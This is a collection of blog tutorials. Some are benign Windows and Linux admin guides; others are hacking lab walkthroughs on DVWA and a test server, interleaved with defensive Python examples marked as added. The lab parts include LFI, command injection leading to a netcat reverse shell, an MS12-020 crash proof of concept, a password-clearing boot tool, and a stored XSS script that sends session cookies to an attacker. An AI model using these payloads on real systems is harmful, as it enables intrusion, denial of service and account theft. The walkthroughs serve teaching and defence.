Chocolatey – Apt-get for Windows


I was at a lecture introducing some of the new features of PowerShell 5. One of the top selling points was the OneGet module. OneGet is a package manager for Windows much like apt-get on *nix systems. It opens up a world of software deployment previously only known on *nix systems.

OneGet uses the NuGet packaging infrastructure to download and install software packages from different repositories. The system-level package manager Chocolatey is a PowerShell execution engine which also builds on NuGet, and Chocolatey currently holds the biggest public repository.

I have often used Ninite when setting up a new Windows system, but Chocolatey seems more flexible and easier to script, and it is basically more of a package manager than a software bundle. In this tutorial we will set up Chocolatey and use it to install a list of software from the Chocolatey repository. The setup process is pretty simple and well described on the Chocolatey website.

1. Open an administrative command prompt by right clicking cmd.exe and choosing Run as administrator


The Command prompt opens.

2. Insert the text below and press Enter

@powershell -NoProfile -ExecutionPolicy unrestricted -Command "iex ((new-object net.webclient).DownloadString(''))" && SET PATH=%PATH%;%ALLUSERSPROFILE%\chocolatey\bin


Chocolatey is now being installed. It is also possible to do this from PowerShell; see the Chocolatey website for how. When the installation is done, it's time to find some software packages in the Chocolatey repository to install. For this tutorial I picked a bunch of packages which I find useful and would like to have installed on my system.

3. Insert the text below and press Enter

choco install notepadplusplus.install 7zip.install firefox adobereader vlc python2 putty filezilla fiddler wget curl procexp teamviewer winscp wireshark winpcap pip spotify evernote windbg vmwarevsphereclient

Chocolatey now works its magic and installs all the specified packages.


Once it is done Chocolatey will display a message, and the software will indeed be installed on the system.



Process Explorer


Process Explorer is like Task Manager on drugs. I have been using it for years, and every time I decide to get to the bottom of it, I get sidetracked because it has so many uses. In this tutorial we will have a look at some of the different tasks Process Explorer can be used for.

Task Manager shows which processes are running, how much memory and CPU they are consuming, etc. Process Explorer does the same, but is much more specific about what kind of process or service it is, which process spawned it, which DLLs and handles it uses, and so on. The main interface shows a tree structure of the processes running on the system. The processes marked in red are services and the blue ones are "own processes" – processes owned by the user you are logged into the system as.


Hovering over a process like svchost.exe reveals a tooltip showing which services it contains. Since svchost is a shared service process, it hosts multiple services sharing that one process. In Task Manager it can be hard to identify which services are running under an svchost process, which is also why malware sometimes disguises itself as svchost.exe.

Process Explorer also shows interrupts, which is basically the time the system spends waiting for different hardware. If a computer has a defective piece of hardware or a driver issue, this can cause a so-called interrupt storm, using up the system's CPU, and you would have no way of seeing this in Task Manager.

Another feature is that you can drag and drop a bullseye icon onto any Windows application, and Process Explorer will identify the process running that application. An example where this is useful is malware removal, where processes are often hidden in order to fool the user.


The columns can be highly customized to show a range of information on the different processes. Let's add a few which I found useful.

1. Download and install Process Explorer

2. Start Process Explorer and right click the top bar and click Select Columns…

The Select Columns dialog box opens.

3. In the Process Image tab mark the two check boxes Command Line and Autostart Location and press OK


These two options add two columns to the main interface. The first one shows the command line used to start that specific process. This could for example be useful if you wanted to script something and didn't know which parameters a specific process should run with.


The other one shows how that process was started: from a key in the Windows registry, from Task Scheduler or just from a link in the Startup folder.


Let’s say that you would like to make some changes to a registry key which starts an application on system startup.

4. Double click the process – here skype.exe

The Skype.exe:1720 Properties dialog box opens.

5. On the Image tab under Autostart Location press the Explore button


The registry editor opens at the exact location, so you will be able to edit the key. We want to edit the key which starts the Skype application and add a parameter so it will start minimized.

6. Double click the registry key Skype

The Edit string dialog box opens.

7. Add the parameter /minimized in the Value data field and click OK


8. Close the registry editor

The next time Windows starts up the Skype application should start minimized instead of in a full Window.


You can also use Process Explorer to find out which process is locking a file. If you are, for example, trying to delete a folder and get hit by the Folder In Use alert, you can identify which program is using this folder.

9. In Process Explorer press Ctrl + F

The Process Explorer search dialog box opens.

10. Enter the path of the folder you are trying to delete – here C:\test – and click Search

Process Explorer will tell you which process is holding the folder, so that you can shut it down and be able to delete the folder.


Another feature in Process Explorer is the possibility to restart or suspend a process. Sometimes, if buggy software or even part of Windows itself hangs or crashes, it's much easier to restart the process than to kill it and start it again manually.

11. Right click the process – here Explorer.exe

12. Click Restart


I don't use the suspend option that often, but it is a nice feature which can lock an application down completely. Let's say the system gets some sort of malware which spawns new processes and switches between processes to avoid detection. With the suspend feature you will be able to freeze the process and maybe figure out what it's doing and how to remove it. I recommend this video on how Process Explorer can be used for malware removal.

13. Right click the process – here calc.exe

14. Click Suspend

The calculator application is now completely frozen: it cannot be accessed or interact with your system in any way. To resume the application, right click the process and click Resume.


These were a few examples of how Process Explorer can be put to use. You can dig much deeper with this tool, and it's a must-have for advanced system debugging.


Local File Inclusion & Remote Command Execution


Local File Inclusion (LFI) is an exploit which involves gaining access to local system files of a web server through a website. The vulnerability occurs when a website does not have proper validation of which files it can and cannot include. From an attacker's point of view the goal of LFI is often to gain vital system information or to achieve Remote Code Execution (RCE). The purpose of this tutorial is to show the danger of LFI and RCE and why you should always sanitize your page includes when building a website.
In this scenario we have a Kali Linux box acting as web server on the IP address and an attacking computer running Windows 8.1 with the address. We will be using the penetration testing application Damn Vulnerable Web Application (DVWA), which has already been installed on the Linux box.

1. Navigate to your DVWA website – here

2. Login with the username admin and password password

3. Click the File Inclusion button

Note that DVWA has three different security levels; in order to use this exploit the security level needs to be set to low. If we click the View Source button, DVWA even shows the source code for each security level's file inclusion handling.

  • The Low File Inclusion Source basically allows you to get any file you want. Of course, you might be limited by the operating system, but the PHP code itself has no restriction on which files you can include.
  • The Medium File Inclusion Source is the same, except that it will not let you include anything that starts with http or https.
  • Finally, the High File Inclusion Source does not allow you to include anything other than the file include.php; if you try, the error ERROR: File not found! is displayed.

4. Change the end of the URL from page=include.php to page=/etc/passwd

The content of the local file passwd located in the /etc/ directory is now displayed on the screen. This file contains information on all the users on the server. Various other files could be of interest, especially log and error files, because these can be manipulated through the requested URL and POST parameters. In this scenario we will however not use LFI for gaining RCE. Instead, I encourage you to have a look at this video by Chris Andrè Dale.
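The three security levels above, reimplemented in Python as an added example (this is not DVWA's PHP): on the tutorial's own inputs it shows why the medium blocklist still lets /etc/passwd through while the high allowlist does not, and resolve_include goes one step further than the tutorial by also pinning the resolved path inside a directory. PAGE_DIR, the function names and the traversal candidate are my own assumptions.

```python
import os

# Assumed placeholder for the directory includable pages live in (not DVWA's real path).
PAGE_DIR = "/var/www/pages"
# The only page the "high" level accepts, per the tutorial.
ALLOWED_PAGES = {"include.php"}


def allowed_low(page):
    """DVWA 'low' as the tutorial describes it: any value is handed to include()."""
    return True


def allowed_medium(page):
    """DVWA 'medium' as described: a blocklist that only rejects values starting
    with http/https. Local paths such as /etc/passwd sail straight through."""
    return not page.lower().startswith("http")


def allowed_high(page):
    """DVWA 'high' as described: an allowlist; everything but include.php is refused."""
    return page in ALLOWED_PAGES


def check_levels(candidates):
    """Map each candidate 'page' parameter to its (low, medium, high) verdicts."""
    return {c: (allowed_low(c), allowed_medium(c), allowed_high(c)) for c in candidates}


def resolve_include(page, page_dir=PAGE_DIR, allowed=ALLOWED_PAGES):
    """Allowlist plus canonical-path check. Even if an allowlist entry were ever
    misconfigured to contain '..' or an absolute path, the resolved file must still
    lie inside page_dir; otherwise ValueError is raised instead of the file being served."""
    if page not in allowed:
        raise ValueError("page not in allowlist: %r" % page)
    base = os.path.realpath(page_dir)
    # os.path.join discards base when page is absolute; the commonpath check catches that.
    target = os.path.realpath(os.path.join(base, page))
    if os.path.commonpath([base, target]) != base:
        raise ValueError("resolved path escapes %s: %s" % (base, target))
    return target


def is_safe_include(page, **kwargs):
    """Boolean wrapper around resolve_include for quick checks."""
    try:
        resolve_include(page, **kwargs)
        return True
    except ValueError:
        return False


# Constructed inputs: the legitimate page, the file the tutorial reads, a traversal
# variant of it (my addition), and a remote URL that only medium/high reject.
CANDIDATES = [
    "include.php",
    "/etc/passwd",
    "../../../../etc/passwd",
    "http://example.invalid/page.txt",
]

if __name__ == "__main__":
    for page, verdict in check_levels(CANDIDATES).items():
        print("%-35s low=%-5s medium=%-5s high=%s" % ((page,) + verdict))
```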

For RCE we will be exploiting another vulnerability. Again, in order to do this the security level needs to be set to low. The function Ping for FREE in DVWA allows us to execute the ping command through the website. However, if the input is not properly filtered, we can trick the website into executing other commands as well.

5. Click the Command Execution button

6. Enter the IP address followed by ; pwd and click the Submit button

What we did was tell the site to ping the IP and then (;) execute the command pwd (print working directory). As you can see both commands are executed successfully and the result of pwd is shown as /var/www/vulnerabilities/exec. Now let's try to use this vulnerability to create a remote shell from the Kali Linux server to the attacking Windows 8.1 computer. For this to work both of them need to have Netcat installed. Further reading on using Netcat can be found in the previous Netcat tutorial.

7. From the attacking computer open a command prompt and type nc -lvp 7777

8. In DVWA enter ; nc -nv 7777 -e /bin/bash after the IP address and click the Submit button

In the command prompt we can now see that a connection from the server is initiated. We now have remote shell access to the server. Note that the website also keeps loading because it is still in the process of executing the Netcat command. It will stay like that until we end the connection.

9. Type pwd and press Enter

10. Type whoami and press Enter

The server responds to the commands, showing which directory it currently is in and which user we are logged in as. From here on out I can't say what a real attacker would do, but probably not anything nice.
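The Ping for FREE weakness from the defender's side, as an added Python example rather than DVWA's PHP: the string-building that lets ; pwd ride along, next to a hardened version that accepts only a parsable IP address and runs ping as an argv list without a shell. The function names and the 127.0.0.1 sample value are my own.

```python
import ipaddress
import subprocess
import sys


def vulnerable_command(target):
    """DVWA 'low' Ping for FREE, as the tutorial exploits it: the raw field value is
    appended to a command string that a shell later executes, so a ';' in the
    input starts a second command. This function only returns the string; it is
    never executed here."""
    return "ping -c 3 " + target


def build_ping_argv(target):
    """Hardened form: the input must parse as an IPv4/IPv6 address (an allowlist by
    type, not a blocklist of characters), and the command is built as an argv list,
    so there is no shell left to interpret ';', '|' or '&'."""
    ip = ipaddress.ip_address(target.strip())   # raises ValueError on anything else
    count_flag = "-n" if sys.platform.startswith("win") else "-c"
    return ["ping", count_flag, "3", str(ip)]


def is_valid_target(target):
    """True when build_ping_argv would accept the value."""
    try:
        build_ping_argv(target)
        return True
    except ValueError:
        return False


def run_ping(target, timeout=15):
    """Run the hardened command; returns (exit code, stdout). shell stays False
    (the default), so the argv list goes straight to ping."""
    argv = build_ping_argv(target)
    proc = subprocess.run(argv, capture_output=True, text=True, timeout=timeout)
    return proc.returncode, proc.stdout


if __name__ == "__main__":
    # Constructed inputs: a plain address and the tutorial's injection string.
    for value in ["127.0.0.1", "127.0.0.1; pwd"]:
        print(repr(value), "->", "accepted" if is_valid_target(value) else "rejected")
        print("  vulnerable command line:", vulnerable_command(value))
```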


MS12-020 RDP Vulnerability PoC & Analysis

In March 2012 a security bulletin was released regarding a vulnerability in the Remote Desktop Protocol (RDP). The vulnerability affected almost all Windows platforms and was published as CVE-2012-0002 and MS12-020.

In short, the vulnerability enables an attacker to send a sequence of specially crafted RDP packets, which can result in remote code execution. It can however only be done if Remote Desktop is enabled on the system and Network Level Authentication (NLA) is disabled. There are a lot of technical details on the subject which, to be honest, I don't understand to their full extent.

The story goes that the security researcher Luigi Auriemma found and reported this vulnerability to the Zero Day Initiative (ZDI), who then reported it to Microsoft. But before Microsoft ever released a patch for the vulnerability, Chinese hackers had somehow gotten hold of Auriemma's code and released their proof-of-concept (PoC), showing the vulnerability to the world. Luigi Auriemma's original PoC, which is as simple as sending a specially crafted packet via netcat, can be found here.

An improved version of the Chinese PoC was later released as a Python script, which enables an attacker to make the target machine crash with a Blue Screen of Death (BSOD). All it takes is the ability to run the script and the IP address of the target machine.

The purpose of this tutorial is purely educational and serves to prove the importance of always keeping your systems up to date with the latest security patches. In this scenario we have a Windows Server 2008 R2 machine running on the IP address and an attacking computer running Kali Linux on the IP address

First of all let's check if the Windows server is actually vulnerable. From Microsoft we know that Remote Desktop must be enabled without NLA, and that the patch which fixes this vulnerability for Server 2008 R2 is called KB2621440.

1. On the Windows server right click Computer and click Properties

2. Click Remote Settings

3. Check that the radio button Allow connections from computers running any version of Remote Desktop (less secure) is selected.

Now let's check that the KB2621440 patch is not already installed.

4. Open up a command prompt and type wmic qfe | find "KB2621440"

No output is returned, which means that the patch isn't installed on the server. So all the criteria for the vulnerability are met. Now let's go to the attacker's point of view.

5. On the Kali Linux machine open a terminal and type wget -O

6. Type chmod 777

What we just did was download the code for the Python script from Pastebin and place it in a file. Then we made the script executable by setting the permissions on the file with chmod. All that is left now is to point the script at the IP address of the Windows server and fire away.

7. Type python

Game over! The script sends a few packets towards the unpatched server, and down she goes.

Let's try to have a closer look at what happened. This is somewhat out of my league, but I gave it a try anyway. Please feel free to correct me if I'm way off here. This is the description given by Luigi Auriemma:

    There is a use-after-free vulnerability located in the handling of the maxChannelIds field of the T.125 ConnectMCSPDU packet (offset 0x2c of the provided proof-of-concept) when set to a value minor/equal than 5.
    The problem happens during the disconnection of the user started with RDPWD!NM_Disconnect while the effect of the possible code execution is visible in termdd!IcaBufferAlloc (or termdd!IcaBufferAllocEx on Windows 7/2008) after termdd!IcaGetPreviousSdLink returns an invalid memory pointer.


The script itself contains only a small amount of Python. Mostly it's just the payload of the packets that is being sent. I'm not sure, but a wild guess would be that the "Fuck you Chelios" packet is the one which delivers the final blow to the server. I could use Python and ndisasm to disassemble the payload of the packet like so:

But really I'm not good enough at reading machine code to understand what this actually does. Instead, let's have a look at the traffic in Wireshark, filtering away all traffic other than that between the attacking computer and the server.

I believe that this is the so-called "Fuck you Chelios" packet, with the maxChannelIds field at offset 0x2c, as in Luigi Auriemma's description.

Following that, we have a bunch of T.125 packets from the server to the attacker containing the field rt-no-such-user. Finally we have an RST, ACK packet from the server which indicates that the connection has been closed. This again fits the description saying that the problem happens during the disconnection of the user.

The information given in the BSOD, that the cause of the problem is in the termdd.sys file (which is the Remote Desktop Server Driver), is also valid. Again this matches the description which says that the problem is related to termdd!IcaBufferAlloc and termdd!IcaGetPreviousSdLink. With my knowledge this is as far as I get with this analysis.

Finally, installing the security update KB2621440 through Windows Update closes this vulnerability, thereby, hopefully, proving my point about always keeping your systems up to date.



In a former tutorial, I showed how to hack a Windows 7 account password without any tools at all. In that tutorial I mentioned that there were also tools available to do this. Since I just lost the password to one of my virtual machines, I decided to make a quick tutorial on how to use such a tool. I will be using the tool Activpasswordchanger.

This is real basic stuff, I know, but it shows you that with the right tools, getting access to a system account is child's play unless the system disk is encrypted. To do this you need a bootable disk containing Activpasswordchanger. Furthermore you need to set your BIOS to boot from the CD-ROM drive.

1. Boot from the CD-ROM drive and press 0 and then Enter

We are presented with a menu that allows us to make Activpasswordchanger automatically search for the MS SAM database, which is where Windows stores its users' passwords.

2. Press 2 and then Enter

The software will scan the disk for SAM databases; this can take a little while depending on the size of the disk. Once it has been found, select the database to clear the user's password.

3. Press Enter

In this scenario we only have an Administrator and a Guest account on the system. We want to clear the Administrator password, so we choose this account.

4. Press 0 and then Enter

We are now presented with a menu with a few options for this account. The options Password never expires and Clear this User's Password are pre-selected, so all we have to do is accept.

5. Press Y and then Enter

The password has now been removed. All we have to do now is exit the software and reboot.

6. Press Esc, Esc, Esc to exit, remove the disk and restart

The system now starts up and logs on automatically without a password.



FreeRDP – RD Gateway client for Linux

If you are Googling for software that allows you to use Remote Desktop from a Linux OS through an RD Gateway to another server – stop! I spent hours doing the same with no luck. I tried out a bunch of tools, with no luck either. Here are some of the tools I tried which do NOT support this function:

  • Remotedesktop Client
  • Remote Desktop Viewer
  • Remmina Remote Desktop Client
  • 2X Client / Remote Desktop
  • KRDC
  • Jump Desktop
  • Running MS mstsc through Wine

I have previously used iTap Mobile to set up connections through a Remote Gateway (also known as RD Gateway or TS Gateway) from a Mac. I read this could also be used for Linux OSs. But when I went to their site, it turned out that iTap mobile has been discontinued because Microsoft released a new Microsoft Remote Desktop app. This desktop app works for Windows, Mac and Android, but Linux is not mentioned anywhere. So I wrote to the iTap team asking them for advice:

    Hi iTap team

    I’m looking for software which can connect me through an RD Gateway
    (or TS gateway) to a terminal server. I can see you are referring to the new “Microsoft Remote Desktop app”
    for Macs and Android.

    But what about Linux users like myself, is there an alternative to iTap now that you guys discontinued iTap?

This was their reply:


    Thank you very much for your interest in iTap mobile RDP.
    Unfortunately, not that I know of. As far as I know iTap mobile RDP was the only RDP client for Linux that offered RD Gateway support.

    We are very sorry for the inconvenience.
    Best regards,

So what did I do? I turned to the wonderful world of open source software. FreeRDP is an awesome project started by Awake Coding aka Marc-André Moreau. It is still in development, so bugs and missing documentation are to be expected. This tutorial will show you how to compile and use FreeRDP to connect through an RD Gateway to a terminal server from Ubuntu 13.10 32 bit.

First thing is to install Git; if you already have this installed you can skip this step.

1. Open a terminal and type sudo apt-get install git

Once we have Git installed, let's get the source files from GitHub.

2. Type git clone git://

3. Type cd FreeRDP

We also need a bunch of dependencies for compiling and running FreeRDP.

4. Type the following and press Enter

sudo apt-get install build-essential git-core cmake libssl-dev libx11-dev libxext-dev libxinerama-dev \
libxcursor-dev libxdamage-dev libxv-dev libxkbfile-dev libasound2-dev libcups2-dev libxml2 libxml2-dev \
libxrandr-dev libgstreamer0.10-dev libgstreamer-plugins-base0.10-dev

Now that we have all we need, the makefile must be generated.

5. Type cmake -DCMAKE_BUILD_TYPE=Debug -DWITH_SSE2=ON .

Finally, start the build.

6. Type make

Once the build has finished we can install the software itself.

7. Type sudo make install

It will take a while to install, but hopefully without any errors. Once FreeRDP is installed, there is just a little tweaking needed. We need to create a config file which tells the system where the FreeRDP library is placed.

8.ype sudo nano /etc/

9. Insert the line /usr/local/lib/freerdp

10. Save and exit the file

We need to check that the line we inserted is read correctly by the system. For this we run ldconfig, and then check the path with the which command.

11. Type sudo ldconfig

12. Type which xfreerdp

13. Start FreeRDP by typing xfreerdp

FreeRDP should now be installed correctly. If you have any problems doing this, please check the wiki on GitHub.

Let's try using FreeRDP to connect to a terminal server through an RD Gateway server. The syntax is like this:

But since I'm using the same account to identify myself to the RD Gateway and the terminal server, I only need to give one username and password.

15. When asked if you trust the certificate press y

So I get an error that the gateway certificate has changed. Someone has suggested that it is a bug in FreeRDP, because it has to handle both the RD Gateway's certificate and the terminal server's certificate. Anyway, it is an easy fix since we can just use the /cert-ignore option. Note that /cert-ignore turns off certificate validation for the connection altogether, so it is a workaround rather than a fix.

16. Type xfreerdp /cert-ignore /v:WORKSTATION /d:DOMAIN /u:USERNAME /p:PASSWORD /g:GATEWAY

Success – we have connected through the RD Gateway to a terminal server in a protected environment. Remember though that FreeRDP is still in development, so it might be buggy. If anybody knows other software or an easier way to connect to a terminal server through an RD Gateway, please let me know.


Banner Grabbing and Emailing via Telnet

Telnet is an old network protocol which has been around longer than the Internet. It was created for the purpose of remote access to network resources. It sends its data in plain text and is therefore highly insecure. Nowadays it has largely been replaced by the encrypted Secure Shell (SSH). Telnet can however be a useful tool for debugging purposes.

Other protocols which were developed in the early days of the Internet are also quite insecure, because their data is sent in plain text as well. Well-known protocols such as HTTP, FTP and SMTP all do this. This also means that there is nothing stopping you from using Telnet to communicate via these protocols. It might be impractical, but in a debugging situation it is nice to be able to fire up telnet and, for instance, check if your mail server is responding correctly.

This tutorial will show how to do banner grabbing and how to use telnet to send an email via the SMTP protocol. Since the default telnet client in Windows has been disabled since Windows Vista, the first thing you have to do is enable it.

Banner Grabbing with telnet

Telnet can be used to get information about a server. By sending a request via telnet to an open port on the server, it will give back relevant information about itself. This information can be OS, services and application versions. From an intruder's point of view, this information can be used to find systems running an OS or services with known exploits. This is also known as banner grabbing.

Note that when using the Windows Telnet client there is no cursor caret, so you will not be able to see what you are typing. Furthermore, you need to execute your command by hitting the Enter key twice. This tutorial can also be done with software such as PuTTY, which is a little easier to navigate.

1. Open a command prompt and type the following commands one by one, each followed by pressing Enter

telnet 80
HEAD / HTTP/1.0

What we did was telnet to the server hosting the site on port 80, then send a HEAD request to get the HTTP header from the server. Here we can see it is running Apache 2.2.16 on Debian. For the fun of it, let's try requesting the site itself.

2. Type the following commands one by one, each followed by pressing Enter

telnet 80
GET / HTTP/1.1

Again we telnet to the server hosting the site on port 80. But this time we use the GET command, and we also define the host we are requesting. I spared you a bunch of HTML, but it is there.

Sending mails via telnet

First we need to find the name of the mail server. This can be done with the tool nslookup.

1. Open a command prompt and type the following commands one by one, each followed by pressing Enter

set type=mx

Here we defined that we would like to see the MX records for the domain, which means the mail servers used for the domain. They are listed by priority, where the lowest number means the highest priority. For this tutorial we will use the mail server address listed.

2. Type the following commands one by one, each followed by pressing Enter

telnet 25
helo
mail from:
rcpt to:
data
subject: testmail
This is just a test
.

What we just did was telnet to one of Google's mail servers on port 25, which is the port SMTP uses. We greet the server with helo, and it responds "at your service". Then we tell the server which mail address the mail is coming from and which address to send it to; the server responds OK. Then we tell the server that we would like to input data, and it responds "Go ahead". We enter the text for the mail and finally send the mail with a single . on a line by itself. Let's check our mailbox and see if we received the mail.
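Both the HEAD banner grab and the SMTP dialog above as one added Python example (not from the original post): the client side sends exactly the lines typed into telnet and checks every reply code, and two tiny in-process servers, constructed stand-ins that answer with the banner and replies quoted in the text, let it run offline against 127.0.0.1. The host names mx.example.invalid and client.example are placeholders.

```python
import socket
import threading


def _serve_once(handler):
    """Constructed stand-in: serve one connection on an ephemeral localhost port in a
    background thread, passing the socket to handler(conn); returns the port number."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]
    def run():
        conn, _ = srv.accept()
        with conn:
            handler(conn)
        srv.close()
    threading.Thread(target=run, daemon=True).start()
    return port


def _fake_http(conn):
    """Answers any request with the banner the tutorial's HEAD request revealed."""
    rfile = conn.makefile("rb")
    while rfile.readline() not in (b"\r\n", b"\n", b""):   # consume request line and headers
        pass
    conn.sendall(b"HTTP/1.1 200 OK\r\nServer: Apache/2.2.16 (Debian)\r\n"
                 b"Content-Type: text/html\r\nConnection: close\r\n\r\n")


def parse_server_header(raw):
    """Return the Server header value from raw HTTP response bytes, or None."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    for line in head.split("\r\n")[1:]:
        name, _, value = line.partition(":")
        if name.strip().lower() == "server":
            return value.strip()
    return None


def grab_http_banner(host, port, timeout=5.0):
    """Send the same HEAD / HTTP/1.0 request as the telnet session; return the Server header."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(b"HEAD / HTTP/1.0\r\nHost: " + host.encode("ascii") + b"\r\n\r\n")
        raw = s.makefile("rb").read()       # HTTP/1.0: the server closes after the response
    return parse_server_header(raw)


class SmtpError(Exception):
    pass


def _expect(rfile, codes):
    """Read one SMTP reply (skipping '250-' continuation lines); fail unless its code is expected."""
    while True:
        line = rfile.readline().decode("latin-1").rstrip("\r\n")
        if not line:
            raise SmtpError("connection closed by server")
        if len(line) > 3 and line[3] == "-":
            continue
        if int(line[:3]) not in codes:
            raise SmtpError("expected %s, got %r" % (sorted(codes), line))
        return line


def send_mail_like_telnet(host, port, sender, recipient, subject, body, timeout=5.0):
    """Drive the telnet dialog (helo, mail from, rcpt to, data, '.'), checking every reply code."""
    replies = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        rfile = s.makefile("rb")
        def step(command, codes):
            s.sendall(command.encode("latin-1") + b"\r\n")
            replies.append(_expect(rfile, codes))
        replies.append(_expect(rfile, {220}))               # greeting
        step("helo client.example", {250})                   # "at your service"
        step("mail from:<%s>" % sender, {250})
        step("rcpt to:<%s>" % recipient, {250})
        step("data", {354})                                  # "Go ahead"
        step("Subject: %s\r\n\r\n%s\r\n." % (subject, body), {250})   # a lone '.' ends the message
    return replies


def _fake_smtp(conn):
    """Constructed stand-in for a mail server; it speaks only the verbs used above."""
    rfile = conn.makefile("rb")
    conn.sendall(b"220 mx.example.invalid ESMTP ready\r\n")
    in_data = False
    while True:
        line = rfile.readline()
        if not line:
            return
        text = line.decode("latin-1").rstrip("\r\n")
        if in_data:                                          # message body until a lone '.'
            if text == ".":
                in_data = False
                conn.sendall(b"250 2.0.0 OK queued\r\n")
            continue
        verb = text.split(" ", 1)[0].split(":", 1)[0].lower()
        if verb == "helo":
            conn.sendall(b"250 mx.example.invalid at your service\r\n")
        elif verb in ("mail", "rcpt"):
            conn.sendall(b"250 2.1.0 OK\r\n")
        elif verb == "data":
            in_data = True
            conn.sendall(b"354 Go ahead\r\n")
        else:
            conn.sendall(b"502 5.5.1 Unrecognized command\r\n")
```

Against a real host, call grab_http_banner and send_mail_like_telnet with that host and port instead of the stand-ins; a reply outside the expected codes raises SmtpError with the server's exact response.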


Credit goes here and here.


Defacing and Cookie Stealing with Cross-site scripting

In a cross-site scripting (XSS) attack, the attacker injects scripts into input forms, search fields or site URLs in order to make a website do different things when viewed by users. The object of this tutorial is to show the dangers of XSS attacks and why you should never trust user input and always sanitize your input forms when building a web page.

For this tutorial I will be using Damn Vulnerable Web Application (DVWA), which is a web application designed for doing penetration testing in your own environment, in a safe and legal way. This tutorial will not include the steps needed to set up DVWA.

1. Navigate to your DVWA website – here http://localhost/DVWA-1.0.8/login.php

2. Login with the username admin and password password

3. Click the DVWA Security button

4. Select low in the drop down list and press the Submit button

The XSS test

DVWA is now set up to not sanitize any input to forms, which means that absolutely anything you enter will be accepted and placed on the web page.

1. Click the XSS stored button

Here we have a simple guestbook where visitors can enter a message which will be displayed for everyone to see. The idea is of course for the user to input some text which the next users can read. The message can however contain small scripts telling the next user's web browser to execute certain commands. The first attack is to test if the site actually is vulnerable to XSS. We will do this with a small piece of JavaScript which calls the alert function to open up an alert message in the user's web browser.

2. Click in the field Name and type test

3. Click in the field Message and type:

4. Click the Sign Guestbook button

The signed guestbook now appears not to contain any text in the message field. That is because the web browser reads the script as part of the website's own code, and not as a user message to be shown as plain text.

5. Click the XSS stored button again to reload the site

A popup called The page localhost says: opens. The content of the popup is 1. This is the result of your web browser executing the JavaScript we wrote earlier. This is quite harmless, but it proves that the site is vulnerable. DVWA has a nice feature to easily clean the database and thereby also the messages from the guestbook. We are going to do this before trying anything else.

6. Click the Setup button

7. Click the Create / Reset Database button

Defacing with XSS

Okay, so you might be thinking: All right – you can make a popup, big deal! Let's try using XSS to "deface" the guestbook by redirecting the users to another site. Again we will use JavaScript to call a function, this time to open up another website.

1. Click the XSS stored button

2. Click in the field Name and type Deface

3. Click in the field Message and type:

4. Click the Sign Guestbook button

Again nothing is shown in the text field, because the web browser does not treat the script as part of a plain text comment.

5. Click the XSS stored button again to reload the site

You will be redirected to the other site. Every time users visit the guestbook, their web browser will redirect them there instead of showing the content of the guestbook. Let's reset the database again before the next attack.

6. Go back to http://localhost/DVWA-1.0.8/setup.php and press the Create / Reset Database button

    Cookie stealing with XSS

    Let’s turn it up a notch – in this scenario we have an attacker who is on another computer and has access to our DVWA site, but not as admin. His objective is to set up a XSS attack to steal the admin session cookie, send it to him, and use it to gain access to the admin account.

    In this scenario the server running our DVWA site is a Windows computer with the IP address of The attackers computer is running Backtrack, which has the IP address of

    1. On the Backtrack computer – navigate to the DWVA website at

    2. Login with the username 1337 and password charley

    3. Click the XSS stored button

    4. Click in the field Name and type Cookie

    5. Click in the field Message and type:

    [java]<script>new Image().src=""+document.cookie;</script>[/java]

    6. Click the Sign Guestbook button


    What this javascript does, is to try to load an image from the backtrack computer. Along with the request for the image it sends the session cookie from the user who views the guestbook comment to the attackers computer. The site cookie.php does not exist on our backtrack computer, in the real world an attacker would probably set up a php site to receive sessions sent and save them to a file. But in this scenario we will just capture the raw traffic sent to the computer. We can do this by setting up a netcat listener to Listen Verbosly on Port 80 on the Backtrack computer.

    7. Open a terminal window and type nc -lvp 80

    We are now all set for the attack. The attacker can only wait for the admin to visit the guestbook. Let’s play the role of the unknowing admin for a moment.

    8. From the Windows computer visit the site http://localhost/DVWA-1.0.8/login.php

    9. Log in with the username admin and password password

    10. Click the XSS stored button


    The unknowing admin will just be shown an empty message with the title Cookie. But behind the scenes a packet containing the session cookie is sent to the attacker’s computer. Here is what it looks like in Wireshark.


    Right – let’s put on our black hat and play the role of the attacker again. In the terminal window we will see that a session id has been received. We now want to use this session to gain access to the admin account on the DVWA site. This can be done in a variety of ways – here we are going to use a Firefox plugin called Cookies Manager+.


    11. On the Backtrack computer open Firefox and install Cookies Manager+

    12. Navigate to the DVWA website at

    13. Press Tools | Cookie Manager+

    The Cookies Manager+ tool opens. We now want to replace the session cookie of the user 1337 with the session of the user admin.

    14. Double-click the session cookie for the DVWA host, named PHPSESSID

    15. In the Edit cookie window, replace the value in the field Content with the session id captured in the terminal


    16. Press the Save button to close the Edit Cookie window

    17. Press the Close button to close the Cookie manager+ tool

    18. Press F5 to refresh the page


    Voila – the attacker has now gained access to the admin account without ever knowing the password. There is much more to XSS than this, but I think this demonstrates just how dangerous XSS attacks can be. Hopefully web site developers as well as browser developers will be aware of this danger, so that users can browse sites without being betrayed by their own web browsers.


    Whether or not users are hit by XSS attacks depends very much on the web browser used. Some browsers block certain types of XSS attacks which others don’t, and vice versa. Using a plugin like NoScript in your browser helps, since no client-side scripts will be run without your permission.
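    The server-side fixes that would have stopped the attack above, as an added example in Python that is not part of the original post or of DVWA: the guestbook payload from step 5 (with a placeholder host in place of the attacker’s address) is rendered once by plain string concatenation, as the vulnerable guestbook does, and once with HTML output encoding, and the PHP session cookie is issued with the HttpOnly flag so document.cookie cannot read it even if a script does run.

```python
import html
from http.cookies import SimpleCookie

# Constructed sample input: the guestbook payload from the tutorial, with a
# placeholder host in place of the attacker's address.
GUESTBOOK_PAYLOAD = ('<script>new Image().src="http://ATTACKER-HOST/cookie.php?"'
                     '+document.cookie;</script>')

TEMPLATE = '<div class="comment"><b>{name}</b><p>{message}</p></div>'


def render_unsafe(name, message):
    """Concatenate user input straight into HTML, as the vulnerable guestbook
    does: the <script> element survives and the browser executes it."""
    return TEMPLATE.format(name=name, message=message)


def render_safe(name, message):
    """Encode both fields for the HTML body context before they reach the page.
    The same payload is now displayed as literal text and nothing is executed."""
    return TEMPLATE.format(name=html.escape(name, quote=True),
                           message=html.escape(message, quote=True))


def has_raw_script_tag(fragment):
    """Check used only to show the difference between the two renderers:
    does the fragment still contain an unescaped <script tag?"""
    return "<script" in fragment.lower()


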